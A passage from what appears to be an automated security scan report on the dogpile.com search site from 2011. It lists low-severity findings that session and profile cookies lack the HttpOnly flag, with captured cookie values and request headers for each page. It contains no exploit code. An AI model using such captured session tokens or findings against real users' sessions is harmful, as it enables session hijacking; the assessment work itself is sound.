DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d19fcdce85e94a39b89bc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.39. http://www.dogpile.com/dogpile_other/ws/index previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:44 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:44 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/dogpile/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=91f95e6548a4490186bdc16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

7.40. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=58f66cc309544e4c8136c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:47 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:47 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.41. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=48a161ef0c404dfb82c8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:52 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:52 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.42. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=191540b0b4b6493e9fedc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:39 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:39 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=News/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.43. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=81608220bc3644438a64c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:38 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:38 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:38 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.44. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f9207591fc7a45ddb5a6c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:51 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:51 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:51 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.45. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a2dfd4c239b0441ea9d6c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:46 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:46 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:46 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.46. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=b2ec7d68211642c28148c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:56 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:56 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:56 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.47. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f61de8d9831c485b9678c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:44 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:44 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.48. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=4be46901fe6f41908e5ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:37 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:37 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:37 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.49. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/preferences/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=0d789ad599844ecb8757c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:06 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:06 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:06 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.50. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=b178c96e1aba4492b2dac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:05 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.51. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/privacy/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d08462ba76864b45a153c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:35 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:35 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:35 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/privacy/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.52. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=ed5033e7ad35480d9635c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=09595e0bb31848b5a194c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:27 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:27 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
Content-Length: 2186
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com

__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY2x1ZGUFLmljZV
...[SNIP]...

Response

7.53. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=39b2b41ff5024c0491eec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=03e0e226b781481fa972c16a3af0cb01&ActionId=14be2b84e19340ef829ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:59 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:59 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:59 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.54. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=147d5eeccb2149eaadeec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=c1a8f04152fd49d4bbd5c16a3af0cb01&ActionId=afded22df52249fea4b3c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:13 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:13 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:13 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.55. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=eae10ac2cab145b8a2c3c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:00 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:00 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.56. http://www.dogpile.com/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=f7359c30922a46e889b5c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:59 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:59 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:59 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.57. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8ae6cde94044449ca746c16a3af0cb01&ActionId=8e3deae18a0e4ecc8d67c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:19 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:19 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:19 GMT; path=/
wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678119866; path=/
wsRecent=Submit+Site,Web,Relevance,&Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

7.58. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/termsofuse/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=995f53cbbb4c4da7993ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:23 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:23 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:23 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/termsofuse/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.59. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/tips/_iceUrlFlag=11

Issue detail

